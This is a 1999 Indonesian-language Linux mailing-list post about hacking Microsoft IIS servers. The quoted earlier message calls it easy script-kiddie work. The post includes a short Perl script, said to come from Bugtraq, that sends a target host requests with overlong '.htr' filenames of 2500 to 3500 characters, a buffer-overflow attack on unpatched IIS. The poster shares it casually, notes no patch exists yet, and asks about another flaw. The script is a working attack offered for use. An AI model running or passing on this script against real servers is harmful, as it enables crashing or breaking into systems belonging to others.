On Mon, Sep 20, 1999 at 05:29:11PM +0700, A Nonymous Cow wrote:
> untuk porting ke linux dulu saya pakai yg namanya tesoiis.
> sayang sekarang file nya udah ilang, dan site tempat saya ngambil juga
> udah dibredel (packetstorm), mungkin yang laen2 masih ada yah.
> dan satu lagi, hacking iis ini bener2 script kiddies sekali, saya cobain &
> gak nyangka kalau semudah itu bisa ngehack. :)
---
Saya baru ketemu (sebenarnya dulu juga ada), iishack yang menggunakan
perl. Yang mengagetkan, yang membuat ini adalah Randal L. Schwartz, yang
membuat buku Learning Perl, seorang profesor (gak tahu bener gak). Saya
mendapatkannya di bugtraq edisi Juni.
#!/usr/bin/perl
use LWP::Simple;
for ($i = 2500; $i <= 3500; $i++) {
warn "$i\n";
get "http://$ARGV[0]/".('a' x $i).".htr";
}
Saya belum mencoba sih.
Katanya patch untuk ini belum ada, padahal sudah lama kan.
Kemudian yang baru adalah rdp (atau apa tuh), kelemahan ini berlaku di
win95/98, nt dan solaris(?). Di sitenya l0pth atau di netcraft.co.uk juga
ada. Bisa sedikit dibahas???
--
[EMAIL PROTECTED], @ThePentagon.com, @geocities.com
http://jupiter.centrin.net.id/~erganov/ http://www.cryogen.com/erganov/
Join to Indonesia Linux User Group at
http://clubs.yahoo.com/clubs/indonesialinuxusergroup
milis ini didukung oleh :
>> http://www.indolinux.com - dunia linux indonesia
-------------------------------------------------------------------
untuk berhenti kirim email ke [EMAIL PROTECTED]
untuk melihat peraturan kirim email ke [EMAIL PROTECTED]
arsip berada di http://www.mail-archive.com/[email protected]
